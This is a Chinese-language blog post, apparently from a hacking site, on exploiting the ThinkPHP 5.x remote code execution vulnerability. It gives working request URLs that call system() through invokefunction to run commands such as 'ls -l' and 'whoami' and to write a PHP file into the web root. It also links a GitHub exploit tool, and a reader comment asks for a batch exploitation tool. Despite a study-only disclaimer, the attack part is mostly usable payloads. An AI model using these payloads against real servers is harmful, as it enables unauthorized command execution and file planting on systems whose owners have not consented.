ThinkPHP V5.x 远程代码执行漏洞利用(附POC)

  • 内容
  • 相关

漏洞描述:

由于ThinkPHP5 框架控制器名 没有进行足够的安全监测,导致在没有开启强制路由的情况下,可以伪装特定的请求可以直接Getshell


影响范围:v5.x < 5.1.31,<= 5.0.23 


漏洞详情:


本地搭建了一个ThinkPHP5 的环境



https://www.0dayhack.com/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

1.PNG


看看权限


https://www.0dayhack.com/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami


2.png

写个phpinfo


https://www.0dayhack.com/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20phpinfo();?>%27%20>%20info.php


3.png

查看一下

4.png

附上github上的一个poc利用

Dependencies:

pip install -r requirements.txt

6.png


给上地址:

https://github.com/heroanswer/thinkphp_rce_poc/

附上自己弄的  有点小鸡肋,就不用放出了

7.png

鸡肋ing

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:ThinkPHP V5.x 远程代码执行漏洞利用(附POC) - https://www.0dayhack.com/post-867.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

1条评论
  1. avatar

    tfsy1234 Lv.1 Chrome 56.0.2924.90 Chrome 56.0.2924.90 Windows 7 x64 Edition Windows 7 x64 Edition 回复

    求批量工具

    山东省青岛市 联通